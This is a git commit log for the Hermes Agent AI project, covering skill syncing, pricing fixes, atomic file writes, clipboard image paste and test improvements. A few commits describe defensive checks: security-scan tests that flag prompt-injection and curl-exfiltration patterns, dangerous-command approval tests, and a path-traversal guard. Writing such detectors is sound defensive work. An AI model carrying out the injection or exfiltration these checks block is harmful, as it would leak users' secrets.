  grpo-rl-training, guidance, llava, nemo-curator, obliteratus, peft,
  pytorch-fsdp, pytorch-lightning, simpo, slime, stable-diffusion,
  tensorrt-llm, torchtitan, trl-fine-tuning, whisper

- Rewrote sync_skills() with proper update semantics:
  * New skills (not in manifest): copied to user dir
  * Existing skills (in manifest + on disk): updated via hash comparison
  * User-deleted skills (in manifest, not on disk): respected, not re-added
  * Stale manifest entries (removed from bundled): cleaned from manifest

- Added sync_skills() to CLI startup (cmd_chat) and gateway startup
  (start_gateway) — previously only ran during 'hermes update'

- Updated cmd_update output to show new/updated/cleaned counts

- Rewrote tests: 20 tests covering manifest CRUD, dir hashing, fresh
  install, user deletion respect, update detection, stale cleanup, and
  name collision handling

75 bundled skills total. 2002 tests pass.
2026-03-06 15:57:30 -08:00
unmodeled-tyler
1755a9e38a Design agent migration skill for Hermes Agent from OpenClaw | Run successful dry tests with reports
2026-03-06 15:12:45 -08:00
teknium1
585f8528b2 fix: deep review — prefix matching, tool_calls extraction, query perf, serialization
Issues found and fixed during deep code path review:

1. CRITICAL: Prefix matching returned wrong prices for dated model names
   - 'gpt-4o-mini-2024-07-18' matched gpt-4o ($2.50) instead of gpt-4o-mini ($0.15)
   - Same for o3-mini→o3 (9x), gpt-4.1-mini→gpt-4.1 (5x), gpt-4.1-nano→gpt-4.1 (20x)
   - Fix: use longest-match-wins strategy instead of first-match
   - Removed dangerous key.startswith(bare) reverse matching

2. CRITICAL: Top Tools section was empty for CLI sessions
   - run_agent.py doesn't set tool_name on tool response messages (pre-existing)
   - Insights now also extracts tool names from tool_calls JSON on assistant
     messages, which IS populated for all sessions
   - Uses max() merge strategy to avoid double-counting between sources

3. SELECT * replaced with explicit column list
   - Skips system_prompt and model_config blobs (can be thousands of chars)
   - Reduces memory and I/O for large session counts

4. Sets in overview dict converted to sorted lists
   - models_with_pricing / models_without_pricing were Python sets
   - Sets aren't JSON-serializable — would crash json.dumps()

5. Negative duration guard
   - end > start check prevents negative durations from clock drift

6. Model breakdown sort fallback
   - When all tokens are 0, now sorts by session count instead of arbitrary order

7. Removed unused timedelta import

Added 6 new tests: dated model pricing (4), tool_calls JSON extraction,
JSON serialization safety. Total: 69 tests.
2026-03-06 14:50:57 -08:00
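Issue 1's fix in miniature: collect all prefix matches and take the longest, so dated variants resolve to the most specific pricing entry (the table here is an illustrative subset):

```python
PRICING = {"gpt-4o": 2.50, "gpt-4o-mini": 0.15}  # $/M input tokens, subset

def lookup_price(model: str) -> float | None:
    matches = [key for key in PRICING if model.startswith(key)]
    if not matches:
        return None
    # Longest match wins: 'gpt-4o-mini-2024-07-18' -> gpt-4o-mini, not gpt-4o.
    return PRICING[max(matches, key=len)]
```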
teknium1
75f523f5c0 fix: unknown/custom models get zero cost instead of fake estimates
Custom OAI endpoints, self-hosted models, and local inference should NOT
show fabricated cost estimates. Changed default pricing from $3/$12 per
million tokens to $0/$0 for unrecognized models.

- Added _has_known_pricing() to distinguish commercial vs custom models
- Models with known pricing show $ amounts; unknown models show 'N/A'
- Overview shows asterisk + note when some models lack pricing data
- Gateway format adds '(excludes custom/self-hosted models)' note
- Added 7 new tests for custom model cost handling
2026-03-06 14:18:19 -08:00
teknium1
68fbae5692 docs: add Custom & Self-Hosted LLM Providers guide
Comprehensive guide for using Hermes Agent with alternative LLM backends:
- Ollama (local models, zero config)
- vLLM (high-performance GPU inference)
- SGLang (RadixAttention, prefix caching)
- llama.cpp / llama-server (CPU & Metal inference)
- LiteLLM Proxy (multi-provider gateway)
- ClawRouter (cost-optimized routing with complexity scoring)
- 10+ other compatible providers table (Together, Groq, DeepSeek, etc.)
- Choosing the Right Setup decision table
- General custom endpoint setup instructions

All of these work via the existing OPENAI_BASE_URL + OPENAI_API_KEY
custom endpoint support — no code changes needed.
2026-03-06 14:16:06 -08:00
teknium1
80f1dd8d37 docs: add Custom & Self-Hosted LLM Providers guide
Comprehensive guide for using Hermes Agent with alternative LLM backends:
- Ollama (local models, zero config)
- vLLM (high-performance GPU inference)
- SGLang (RadixAttention, prefix caching)
- llama.cpp / llama-server (CPU & Metal inference)
- LiteLLM Proxy (multi-provider gateway)
- ClawRouter (cost-optimized routing with complexity scoring)
- 10+ other compatible providers table (Together, Groq, DeepSeek, etc.)
- Choosing the Right Setup decision table
- General custom endpoint setup instructions

All of these work via the existing OPENAI_BASE_URL + OPENAI_API_KEY
custom endpoint support — no code changes needed.
2026-03-06 14:15:57 -08:00
teknium1
b52b37ae64 feat: add /insights command with usage analytics and cost estimation
Inspired by Claude Code's /insights, adapted for Hermes Agent's multi-platform
architecture. Analyzes session history from state.db to produce comprehensive
usage insights.

Features:
- Overview stats: sessions, messages, tokens, estimated cost, active time
- Model breakdown: per-model sessions, tokens, and cost estimation
- Platform breakdown: CLI vs Telegram vs Discord etc. (unique to Hermes)
- Tool usage ranking: most-used tools with percentages
- Activity patterns: day-of-week chart, peak hours, streaks
- Notable sessions: longest, most messages, most tokens, most tool calls
- Cost estimation: real pricing data for 25+ models (OpenAI, Anthropic,
  DeepSeek, Google, Meta) with fuzzy model name matching
- Configurable time window: --days flag (default 30)
- Source filtering: --source flag to filter by platform

Three entry points:
- /insights slash command in CLI (supports --days and --source flags)
- /insights slash command in gateway (compact markdown format)
- hermes insights CLI subcommand (standalone)

Includes 56 tests covering pricing helpers, format helpers, empty DB,
populated DB with multi-platform data, filtering, formatting, and edge cases.
2026-03-06 14:04:59 -08:00
aydnOktay
566aeaeefa Make skill file writes atomic 2026-03-07 00:49:10 +03:00
Himess
7a0544ab57 fix: three small inconsistencies across cron, gateway, and daytona
1. cron/jobs.py: respect HERMES_HOME env var for job storage path.
   scheduler.py already uses os.getenv("HERMES_HOME", ...) but jobs.py
   hardcodes Path.home() / ".hermes", causing path mismatch when
   HERMES_HOME is set.

2. gateway/run.py: add Platform.HOMEASSISTANT to default_toolset_map
   and platform_config_key. The adapter and hermes-homeassistant
   toolset both exist but the mapping dicts omit it, so HomeAssistant
   events silently fall back to the Telegram toolset.

3. tools/environments/daytona.py: use time.monotonic() for deadline
   instead of float subtraction. All other backends (docker, ssh,
   singularity, local) use monotonic clock for timeout tracking.
   The accumulator pattern (deadline -= 0.2) drifts because
   t.join(0.2) + interrupt checks take longer than 0.2s per iteration.
2026-03-06 16:52:17 +03:00
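For fix 3, the monotonic version looks roughly like this (the function shape is assumed; only the deadline technique comes from the message):

```python
import threading
import time

def wait_for_exit(t: threading.Thread, timeout: float, interrupted) -> bool:
    # A wall deadline from time.monotonic() doesn't drift: each iteration may
    # take longer than 0.2s (join + interrupt checks), which the old
    # 'deadline -= 0.2' accumulator silently ignored.
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        t.join(0.2)
        if not t.is_alive() or interrupted():
            return True
    return False
```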
teknium1
d63b363cde refactor: extract atomic_json_write helper, add 24 checkpoint tests
Extract the duplicated temp-file + fsync + os.replace pattern from
batch_runner.py (1 instance) and process_registry.py (2 instances) into
a shared utils.atomic_json_write() function.

Add 12 tests for atomic_json_write covering: valid JSON, parent dir
creation, overwrite, crash safety (original preserved on error), no temp
file leaks, string paths, unicode, custom indent, concurrent writes.

Add 12 tests for batch_runner checkpoint behavior covering:
_save_checkpoint (valid JSON, last_updated, overwrite, lock/no-lock,
parent dirs, no temp leaks), _load_checkpoint (missing file, existing
data, corrupt JSON), and resume logic (preserves prior progress,
different run_name starts fresh).
2026-03-06 05:50:12 -08:00
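The extracted helper is presumably close to this sketch of the temp-file + fsync + os.replace pattern (signature details assumed):

```python
import json
import os
import tempfile
from pathlib import Path

def atomic_json_write(path, data, indent: int = 2) -> None:
    path = Path(path)
    path.parent.mkdir(parents=True, exist_ok=True)
    fd, tmp = tempfile.mkstemp(dir=path.parent, suffix=".tmp")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as f:
            json.dump(data, f, indent=indent, ensure_ascii=False)
            f.flush()
            os.fsync(f.fileno())  # durable before the swap
        os.replace(tmp, path)  # atomic rename: readers see old or new, never half
    except BaseException:
        try:
            os.unlink(tmp)  # no temp-file leaks on failure
        except OSError:
            pass
        raise
```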
teknium1
c05c60665e Merge PR #298: Make process_registry checkpoint writes atomic
Authored by aydnOktay. Companion to PR #297 (batch_runner). Applies the
same atomic write pattern (temp file + fsync + os.replace) to both
_write_checkpoint() and recover_from_checkpoint() in process_registry.py.
Prevents checkpoint corruption on gateway crashes. Also improves error
handling: bare 'pass' replaced with logger.debug(..., exc_info=True)
for better debugging.
2026-03-06 05:32:35 -08:00
teknium1
b4873a5de7 fix(setup): Escape skips instead of exiting, add control hints to all prompts
Previously pressing Escape in any setup wizard menu called sys.exit(1),
killing the entire wizard with no way to recover. Now:

- prompt_choice: Escape keeps the current default and moves on (prints
  'Skipped (keeping current)'). Shows '↑/↓ Navigate  Enter Select
  Esc Skip  Ctrl+C Exit' hint.
- prompt_checklist: Escape returns pre-selected items instead of empty
  list. Shows 'SPACE Toggle  ENTER Confirm  ESC Skip  Ctrl+C Exit'.
- prompt_yes_no: now catches KeyboardInterrupt/EOFError properly.
- Fallback number prompts also show control hints.

Ctrl+C still exits the wizard cleanly.
2026-03-06 05:27:11 -08:00
teknium1
913f8ce0a5 Merge PR #297: Make batch_runner checkpoint incremental and atomic
Authored by aydnOktay. Three improvements to batch_runner fault tolerance:
1) Atomic checkpoint writes (temp file + fsync + os.replace) to prevent
   corruption on crashes — same pattern as auth.py's _save_auth_store().
2) Incremental checkpoints after each batch result instead of only at end,
   so interrupted runs can resume with minimal progress loss.
3) Resume loads existing checkpoint state instead of initializing empty,
   preventing clobber of prior progress.

Conflict resolved: kept both the incremental checkpoint logic (PR) and
the batch worker error handling (HEAD) in the imap_unordered loop.
2026-03-06 05:16:31 -08:00
Himess
453e0677d6 fix: use regex for search output parsing to handle Windows drive-letter paths
The ripgrep/grep output parser uses `split(':', 2)` to extract
file:lineno:content from match lines. On Windows, absolute paths
contain a drive letter colon (e.g. `C:\Users\foo\bar.py:42:content`),
so `split(':', 2)` produces `["C", "\Users\...", "42:content"]`.
`int(parts[1])` then raises ValueError and the match is silently
dropped. All search results are lost on Windows.

Same category as #390 — string-based path parsing that fails on
Windows. Replace `split()` with a regex that optionally captures
the drive letter prefix: `^([A-Za-z]:)?(.*?):(\d+):(.*)$`.

Applied to both `_search_with_rg` and `_search_with_grep`.
2026-03-06 15:54:33 +03:00
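The regex from the message, wired into a parser (only the pattern itself is from the commit; the helper around it is illustrative):

```python
import re

# Optionally capture a drive-letter prefix so 'C:\Users\foo\bar.py:42:content'
# parses the same way as 'src/app.py:42:content'.
MATCH_LINE = re.compile(r"^([A-Za-z]:)?(.*?):(\d+):(.*)$")

def parse_match_line(line: str):
    m = MATCH_LINE.match(line)
    if not m:
        return None  # not a match line; skip instead of raising
    drive, path, lineno, content = m.groups()
    return (drive or "") + path, int(lineno), content
```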
teknium1
4a63737227 Merge PR #433: fix(whatsapp): replace Linux-only fuser with cross-platform port cleanup
Authored by Farukest. Fixes #432. Extracts _kill_port_process() helper
that uses netstat+taskkill on Windows and fuser on Linux. Previously,
fuser calls were inline with bare except-pass, so on Windows orphaned
bridge processes were never cleaned up — causing 'address already in use'
errors on reconnect. Includes 5 tests covering both platforms, port
matching edge cases, and exception suppression.
2026-03-06 04:52:25 -08:00
teknium1
3e93db16bd Merge PR #436: fix: use _max_tokens_param in max-iterations retry path
Authored by Farukest. Fixes #435. The retry summary in
_handle_max_iterations() hardcoded max_tokens instead of using
_max_tokens_param(), which returns max_completion_tokens for direct
OpenAI API (required by gpt-4o, o-series). The first attempt already
used _max_tokens_param correctly — only the retry path was wrong.
Includes 4 tests for _max_tokens_param provider detection.
2026-03-06 04:46:24 -08:00
teknium1
f863a42351 Merge PR #441: fix(gateway): return response from /retry handler instead of discarding it
Authored by PercyDikec. Fixes #440. _handle_retry_command called
_handle_message(retry_event) but discarded the return value, returning
None instead. Since only _process_message_background sends the response
via adapter.send(), this meant the agent would run (tool progress was
visible) but the final answer was silently dropped on all platforms.
2026-03-06 04:42:54 -08:00
teknium1
dc55f493be fix: add missing re.DOTALL to DeepSeek V3.1 parser (same bug as V3)
The V3.1 parser had the same issue — .*? without re.DOTALL fails to
match multi-line JSON arguments. Found during review of PR #444.
2026-03-06 04:41:47 -08:00
teknium1
936fda3f9e Merge PR #444: fix: add missing re.DOTALL flag to DeepSeek V3 tool call parser
Authored by PercyDikec. Fixes #443. Without re.DOTALL, the regex .*
doesn't match newlines, so multi-line JSON arguments (the normal case)
silently fail to parse. Every other parser in the codebase that matches
across lines already uses re.DOTALL.
2026-03-06 04:39:53 -08:00
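A two-line demonstration of the failure mode (the tag format here is illustrative, not DeepSeek's actual wire format):

```python
import re

blob = '<tool_call>{"name": "search",\n "arguments": {}}</tool_call>'
print(re.search(r"<tool_call>(.*?)</tool_call>", blob))             # None: '.' stops at \n
print(re.search(r"<tool_call>(.*?)</tool_call>", blob, re.DOTALL))  # matches
```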
teknium1
ecb8148a9f Merge PR #448: fix(cli): use correct dict key for codex auth file path in status output
Authored by PercyDikec. Fixes #447. The status display used
codex_status.get('auth_file') but get_codex_auth_status() in auth.py
returns the path under 'auth_store' (line 1220). This one-char key
mismatch silently dropped the auth file path from 'hermes status'.
2026-03-06 04:34:46 -08:00
teknium1
2dbbedc05a docs: rebrand messaging — 'the self-improving AI agent'
- Lead with the learning loop: autonomous skill creation, skill
  self-improvement, memory nudges, FTS5 session search, Honcho
  dialectic user modeling
- 'Runs anywhere' angle: 6 backends, serverless persistence with
  Daytona/Modal, not tied to your laptop
- 'Built by model trainers' replaces 'model-agnostic'
- Updated README tagline, feature table, subtitle
- Updated docs landing page hero, description, key features
- Updated docusaurus tagline and pyproject.toml description
2026-03-06 04:34:06 -08:00
teknium1
c30967806c test: add 26 tests for set_config_value secret routing
Verifies explicit allowlist keys, catch-all _API_KEY/_TOKEN patterns,
case insensitivity, TERMINAL_SSH prefix, and config.yaml routing for
non-secret keys. Covers the fix from PR #469.
2026-03-06 04:26:18 -08:00
teknium1
145f719d30 Merge PR #469: fix(config): route API keys and tokens to .env instead of config.yaml
Authored by ygd58. Fixes #465. Adds missing keys to allowlist and
catch-all patterns (_API_KEY, _TOKEN suffixes) for future-proofing.
2026-03-06 04:23:49 -08:00
Himess
32dbd31b9a fix: restrict .env file permissions to owner-only
save_env_value() writes API keys to ~/.hermes/.env but never sets file
permissions, leaving the file world-readable (0644). auth.py already
restricts auth.json to 0600 — apply the same treatment to .env.

Skipped on Windows where chmod is not effective.
2026-03-06 15:14:26 +03:00
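The treatment, sketched (the write itself is simplified; only the owner-only-on-POSIX behavior comes from the message):

```python
import os
import stat
import sys
from pathlib import Path

def save_env_value(env_path: Path, line: str) -> None:
    with open(env_path, "a", encoding="utf-8") as f:
        f.write(line + "\n")
    if sys.platform != "win32":  # chmod is not effective on Windows; skip it
        os.chmod(env_path, stat.S_IRUSR | stat.S_IWUSR)  # 0600, owner-only
```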
teknium1
b89eb29174 fix: correct mock tool name 'search' → 'search_files' in test_code_execution
The mock handler checked for function_name == 'search' but the RPC
sends 'search_files'. Any test exercising search_files through the
mock would get 'Unknown tool' instead of the canned response.
2026-03-06 03:53:43 -08:00
teknium1
3670089a42 docs: add Daytona to batch_runner, process_registry, agent_loop, tool_context
Add daytona_image to batch_runner per-prompt container image overrides
so batch processing works with the Daytona backend. Update inline
comments in RL environment files (agent_loop, tool_context) and
process_registry docstrings to include Daytona in backend lists.
2026-03-06 03:49:59 -08:00
teknium1
3982fcf095 fix: sync execute_code sandbox stubs with real tool schemas
The _TOOL_STUBS dict in code_execution_tool.py was out of sync with the
actual tool schemas, causing TypeErrors when the LLM used parameters it
sees in its system prompt but the sandbox stubs didn't accept:

search_files:
  - Added missing params: context, offset, output_mode
  - Fixed target default: 'grep' → 'content' (old value was obsolete)

patch:
  - Added missing params: mode, patch (V4A multi-file patch support)

Also added 4 drift-detection tests (TestStubSchemaDrift) that will
catch future divergence between stubs and real schemas:
  - test_stubs_cover_all_schema_params: every schema param in stub
  - test_stubs_pass_all_params_to_rpc: every stub param sent over RPC
  - test_search_files_target_uses_current_values: no obsolete values
  - test_generated_module_accepts_all_params: generated code compiles

All 28 tests pass.
2026-03-06 03:40:06 -08:00
teknium1
8481fdcf08 docs: complete Daytona backend documentation coverage
Update all remaining files that enumerate terminal backends to include
Daytona. Covers security docs (bypass info, backend comparison table),
environment variables reference (DAYTONA_API_KEY, TERMINAL_DAYTONA_IMAGE,
container resources header), AGENTS.md (architecture tree, config keys),
environments/README.md, hermes_base_env.py field description, and various
module docstrings.

Follow-up to PR #451 merge.
2026-03-06 03:37:05 -08:00
teknium1
39299e2de4 Merge PR #451: feat: Add Daytona environment backend
Authored by rovle. Adds Daytona as the sixth terminal execution backend
with cloud sandboxes, persistent workspaces, and full CLI/gateway integration.
Includes 24 unit tests and 8 integration tests.
2026-03-06 03:32:40 -08:00
teknium1
efec4fcaab feat(execute_code): add json_parse, shell_quote, retry helpers to sandbox
The execute_code sandbox generates a hermes_tools.py stub module for LLM
scripts. Three common failure modes keep tripping up scripts:

1. json.loads(strict=True) rejects control chars in terminal() output
   (e.g., GitHub issue bodies with literal tabs/newlines)
2. Shell backtick/quote interpretation when interpolating dynamic content
   into terminal() commands (markdown with backticks gets eaten by bash)
3. No retry logic for transient network failures (API timeouts, rate limits)

Adds three convenience helpers to the generated hermes_tools module:

- json_parse(text) — json.loads with strict=False for tolerant parsing
- shell_quote(s) — shlex.quote() for safe shell interpolation
- retry(fn, max_attempts=3, delay=2) — exponential backoff wrapper

Also updates the EXECUTE_CODE_SCHEMA description to document these helpers
so LLMs know they're available without importing anything extra.

Includes 7 new tests (unit + integration) covering all three helpers.
2026-03-06 01:52:46 -08:00
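The three helpers, roughly as described (the backoff shape in retry is an assumption beyond the stated signature):

```python
import json
import shlex
import time

def json_parse(text: str):
    # strict=False tolerates control chars (literal tabs/newlines) in tool output.
    return json.loads(text, strict=False)

def shell_quote(s: str) -> str:
    # Safe interpolation into terminal() commands: backticks, quotes, $ survive.
    return shlex.quote(s)

def retry(fn, max_attempts: int = 3, delay: float = 2):
    # Exponential backoff for transient failures (timeouts, rate limits).
    for attempt in range(1, max_attempts + 1):
        try:
            return fn()
        except Exception:
            if attempt == max_attempts:
                raise
            time.sleep(delay * 2 ** (attempt - 1))
```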
teknium1
5ce2c47d60 docs: update all docs for optional-skills and browse command
Update 7 documentation files to reflect:
- optional-skills/ directory in all project structure trees
- 'hermes skills browse' in all CLI command listings
- '/skills browse' in all slash command references
- Three-tier skill placement (bundled → optional → hub)
- 'official' trust level in trust level tables
- Updated /skills description from 'Search, install...' to 'Browse, search...'

Files updated:
- CONTRIBUTING.md (skill classification, project tree, section title)
- AGENTS.md (project tree, Skills Hub description, source adapters list)
- website/docs/reference/cli-commands.md (CLI table, slash command table)
- website/docs/developer-guide/creating-skills.md (structure, classification, trust)
- website/docs/user-guide/features/skills.md (hub commands, trust table, slash commands)
- website/docs/user-guide/cli.md (slash command description)
- website/docs/developer-guide/architecture.md (project tree)
2026-03-06 01:46:34 -08:00
teknium1
f6f3d1de9b fix: review fixes — path traversal guard, trust_style consistency, edge cases
Address code review findings:

Security (Medium):
- Path traversal guard in OptionalSkillSource.fetch() — resolve() and
  validate that the path stays within optional-skills/ before reading

Bug fixes (Medium):
- Add 'builtin' to trust_style dicts in do_inspect() and
  _resolve_short_name() — official skills now show bright_cyan 'official'
  label consistently across all display functions (5/5 dicts fixed)

Edge cases (Low):
- Clamp page_size to [1, 100] in do_browse() to prevent ZeroDivisionError
- Update SkillMeta.source docstring to include 'official'
- Add browse command to optional-skills/DESCRIPTION.md
2026-03-06 01:40:01 -08:00
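The traversal guard amounts to a resolve-then-containment check, roughly (paths and names illustrative):

```python
from pathlib import Path

OPTIONAL_SKILLS_DIR = Path("optional-skills").resolve()

def fetch_skill_file(name: str) -> str:
    candidate = (OPTIONAL_SKILLS_DIR / name).resolve()  # collapses '..' and symlinks
    if not candidate.is_relative_to(OPTIONAL_SKILLS_DIR):
        raise ValueError(f"path escapes optional-skills/: {name}")
    return candidate.read_text(encoding="utf-8")
```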
teknium1
ec0fe3242a feat: 'hermes skills browse' — paginated browsing of all hub skills
Add a browse command that shows all available skills across all registries,
paginated and sorted with official skills first.

Usage:
  hermes skills browse                    # all sources, page 1
  hermes skills browse --source official  # only official optional skills
  hermes skills browse --page 2           # page 2
  hermes skills browse --size 30          # 30 per page
  /skills browse                          # slash command in chat

Features:
- Official optional skills always appear first (★ marker, cyan styling)
- Per-source limits prevent overloading (100 official/github, 50 others)
- Deduplication by name preferring higher trust
- Sorted: official > trusted > community, then alphabetical
- Page navigation hints at bottom
- Source counts summary
- Works in both CLI and /skills chat interface
- Added 'official' as source filter option for search command too
2026-03-06 01:29:45 -08:00
teknium1
f2e24faaca feat: optional skills — official skills shipped but not activated by default
Add 'optional-skills/' directory for official skills that ship with the repo
but are not copied to ~/.hermes/skills/ during setup. They are:
- NOT shown to the model in the system prompt
- NOT copied during hermes setup/update
- Discoverable via 'hermes skills search' labeled as 'official'
- Installable via 'hermes skills install' with builtin trust (no third-party warning)
- Auto-categorized on install based on directory structure

Implementation:
- OptionalSkillSource adapter in tools/skills_hub.py (search/fetch/inspect)
- Added to create_source_router() as first source (highest priority)
- Trust level 'builtin' for official skills in skills_guard.py
- Friendly install message for official skills (no third-party warning)
- 'official' label in cyan in search results and skill list

First optional skill: Blackbox CLI (autonomous-ai-agents/blackbox)
- Multi-model coding agent with built-in judge/Chairman pattern
- Delegates to Claude, Codex, Gemini, and Blackbox models
- Open-source CLI (GPL-3.0, TypeScript, forked from Gemini CLI)
- Requires paid Blackbox AI API key

Refs: #475
2026-03-06 01:24:11 -08:00
teknium1
8c80b96318 chore: update OpenRouter model list
- Remove opus-4.5 and gpt-5.2
- Reorder GPT: 5.4-pro, 5.4, 5.3-codex
- Add qwen/qwen3.5-plus-02-15 and qwen/qwen3.5-35b-a3b
- Update z-ai/glm-4.7 → glm-5
- Update minimax/minimax-m2.1 → minimax-m2.5
2026-03-06 00:52:45 -08:00
teknium1
2387465dcc chore: add openai/gpt-5.4-pro and stepfun/step-3.5-flash to OpenRouter models 2026-03-06 00:49:25 -08:00
tars90percent
32636ecf8a Update MiniMax model ID from m2.1 to m2.5 2026-03-06 16:47:48 +08:00
ygd58
6055adbe1b fix(config): route API keys and tokens to .env instead of config.yaml 2026-03-06 08:55:36 +01:00
teknium1
ffd2f8dc50 docs: add Vision & Image Paste guide with platform compatibility
New docs page covering clipboard image paste across all platforms:
- Platform compatibility table (macOS, Linux X11/Wayland, WSL2, VSCode, SSH)
- Setup instructions per platform (xclip, wl-paste, powershell.exe)
- Explanation of terminal paste limitations and why /paste exists
- SSH workarounds (file upload, URLs, X11 forwarding, messaging)
- Keybinding reference (Alt+V, Ctrl+V, /paste) with when each works

Also updates CLI commands reference with /paste command and
Alt+V keybinding documentation.
2026-03-05 23:51:46 -08:00
teknium1
e93b4d1dcd feat: Alt+V keybinding for clipboard image paste
Alt key combos pass through all terminal emulators (sent as ESC + key),
unlike Ctrl+V which terminals intercept for text paste. This is the
reliable way to attach clipboard images on WSL2, Windows Terminal,
VSCode, and SSH sessions where Ctrl+V never reaches the application
for image-only clipboard content.

Also adds 'Paste image: Alt+V (or /paste)' hint to /help output.
2026-03-05 22:48:39 -08:00
teknium1
014a5b712d fix: prevent duplicate gateway instances from running simultaneously
start_gateway() now checks for an existing running instance via PID file
before starting. If another gateway is already running under the same
HERMES_HOME, it refuses to start with a clear error message directing the
user to 'hermes gateway restart' or 'hermes gateway stop'.

Also fixes gateway/status.py to respect the HERMES_HOME env var instead of
hardcoding ~/.hermes. This scopes the PID file per HERMES_HOME directory,
which lays the groundwork for future multi-profile support where distinct
HERMES_HOME directories can run concurrent gateway instances independently.
2026-03-05 20:35:33 -08:00
teknium1
2317d115cd fix: clipboard image paste on WSL2, Wayland, and VSCode terminal
The original implementation only supported xclip (X11), which silently
fails on WSL2 (can't access Windows clipboard for images), Wayland
desktops (xclip is X11-only), and VSCode terminal on WSL2.

Clipboard backend changes (hermes_cli/clipboard.py):
- WSL2: detect via /proc/version, use powershell.exe with .NET
  System.Windows.Forms.Clipboard to extract images as base64 PNG
- Wayland: use wl-paste with MIME type detection, auto-convert BMP
  to PNG for WSLg environments (via Pillow or ImageMagick)
- Dispatch order: WSL → Wayland → X11 (xclip), with fallthrough
- New has_clipboard_image() for lightweight clipboard checks
- Cache WSL detection result per-process

CLI changes (cli.py):
- /paste command: explicit clipboard image check for terminals where
  BracketedPaste doesn't fire (image-only clipboard in VSCode/WinTerm)
- Ctrl+V keybinding: fallback for Linux terminals where Ctrl+V sends
  raw byte instead of triggering bracketed paste

Tests: 80 tests (up from 37) covering WSL, Wayland, X11 dispatch,
BMP conversion, has_clipboard_image, and /paste command.
2026-03-05 20:22:44 -08:00
teknium1
8253b54be9 test: strengthen assertions in skill_manager + memory_tool (batch 3)
test_skill_manager_tool.py (20 weak → 0):
  - Validation error messages verified against exact strings
  - Name validation: checks specific invalid name echoed in error
  - Frontmatter validation: exact error text for missing fields,
    unclosed markers, empty content, invalid YAML
  - File path validation: traversal, disallowed dirs, root-level

test_memory_tool.py (13 weak → 0):
  - Security scan tests verify both 'Blocked' prefix AND specific
    threat pattern ID (prompt_injection, exfil_curl, etc.)
  - Invisible unicode tests verify exact codepoint strings
  - Snapshot test verifies type, header, content, and isolation
2026-03-05 18:51:43 -08:00
teknium1
5c867fd79f test: strengthen assertions across 3 more test files (batch 2)
test_run_agent.py (2 weak → 0, +13 assertions):
  - Session ID validated against actual YYYYMMDD_HHMMSS_hex format
  - API failure verifies error message propagation
  - Invalid JSON args verifies empty dict fallback + message structure
  - Context compression verifies final_response + completed flag
  - Invalid tool name retry verifies api_calls count
  - Invalid response verifies completed/failed/error structure

test_model_tools.py (3 weak → 0):
  - Unknown tool error includes tool name in message
  - Exception returns dict with 'error' key + non-empty message
  - get_all_tool_names verifies both web_search AND terminal present

test_approval.py (1 weak → 0, assert ratio 1.1 → 2.2):
  - Dangerous commands verify description content (delete, shell, drop, etc.)
  - Safe commands explicitly assert key AND desc are None
  - Pre/post condition checks for state management
2026-03-05 18:46:30 -08:00
teknium1
a44e041acf test: strengthen assertions across 7 test files (batch 1)
Replaced weak 'is not None' / '> 0' / 'len >= 1' assertions with
concrete value checks across the most flagged test files:

gateway/test_pairing.py (11 weak → 0):
  - Code assertions verify isinstance + len == CODE_LENGTH
  - Approval results verify dict structure + specific user_id/user_name
  - Added code2 != code1 check in rate_limit_expires

test_hermes_state.py (6 weak → 0):
  - ended_at verified as float timestamp
  - Search result counts exact (== 2, not >= 1)
  - Context verified as non-empty list
  - Export verified as dict, session ID verified

test_cli_init.py (4 weak → 0):
  - max_turns asserts exact value (60)
  - model asserts string with provider/name format

gateway/test_hooks.py (2 zero-assert tests → fixed):
  - test_no_handlers_for_event: verifies no handler registered
  - test_handler_error_does_not_propagate: verifies handler count + return

gateway/test_platform_base.py (9 weak image tests → fixed):
  - extract_images tests now verify actual URL and alt_text
  - truncate_message verifies content preservation after splitting

cron/test_scheduler.py (1 weak → 0):
  - resolve_origin verifies dict equality, not just existence

cron/test_jobs.py (2 weak → 0 + 4 new tests):
  - Schedule parsing verifies ISO timestamp type
  - Cron expression verifies result is valid datetime string
  - NEW: 4 tests for update_job() (was completely untested)
2026-03-05 18:39:37 -08:00
teknium1
e9f05b3524 test: comprehensive tests for model metadata + firecrawl config
model_metadata tests (61 tests, was 39):
  - Token estimation: concrete value assertions, unicode, tool_call messages,
    vision multimodal content, additive verification
  - Context length resolution: cache-over-API priority, no-base_url skips cache,
    missing context_length key in API response
  - API metadata fetch: canonical_slug aliasing, TTL expiry with time mock,
    stale cache fallback on API failure, malformed JSON resilience
  - Probe tiers: above-max returns 2M, zero returns None
  - Error parsing: Anthropic format ('X > Y maximum'), LM Studio, empty string,
    unreasonably large numbers — also fixed parser to handle Anthropic format
  - Cache: corruption resilience (garbage YAML, wrong structure), value updates,
    special chars in model names

Firecrawl config tests (8 tests, was 4):
  - Singleton caching (core purpose — verified constructor called once)
  - Constructor failure recovery (retry after exception)
  - Return value actually asserted (not just constructor args)
  - Empty string env vars treated as absent
  - Proper setup/teardown for env var isolation
2026-03-05 18:22:39 -08:00
teknium1
e2a834578d refactor: extract clipboard methods + comprehensive tests (37 tests)
Refactored image paste internals for testability:
- Extracted _try_attach_clipboard_image() method (clipboard → state)
- Extracted _build_multimodal_content() method (images → OpenAI format)
- chat() now delegates to these instead of inline logic

Tests organized in 4 levels:
  Level 1 (19 tests): Clipboard module — every platform path with
    realistic subprocess simulation (tools writing files, timeouts,
    empty files, cleanup on failure)
  Level 2 (8 tests): _build_multimodal_content — base64 encoding,
    MIME types (png/jpg/webp/unknown), missing files, multiple images,
    default question for empty text
  Level 3 (5 tests): _try_attach_clipboard_image — state management,
    counter increment/rollback, naming convention, mixed success/failure
  Level 4 (5 tests): Queue routing — tuple unpacking, command detection,
    images-only payloads, text-only payloads
2026-03-05 18:07:53 -08:00
teknium1
ffc752a79e test: improve clipboard tests with realistic scenarios and multimodal coverage
Rewrote clipboard tests from 11 shallow mocks to 21 realistic tests:
- Success paths now simulate tools actually writing files (not pre-created)
- osascript: success with PNG, success with TIFF, extraction-fail cases
- pngpaste: empty file rejection edge case
- Linux: extraction failure cleanup verification
- New TestMultimodalConversion class: base64 encoding, MIME types,
  multiple images, missing file handling, default question fallback
2026-03-05 17:58:06 -08:00
teknium1
399562a7d1 feat: clipboard image paste in CLI (Cmd+V / Ctrl+V)
Copy an image to clipboard (screenshot, browser, etc.) and paste into
the Hermes CLI. The image is saved to ~/.hermes/images/, shown as a
badge above the input ([📎 Image #1]), and sent to the model as a
base64-encoded OpenAI vision multimodal content block.

Implementation:
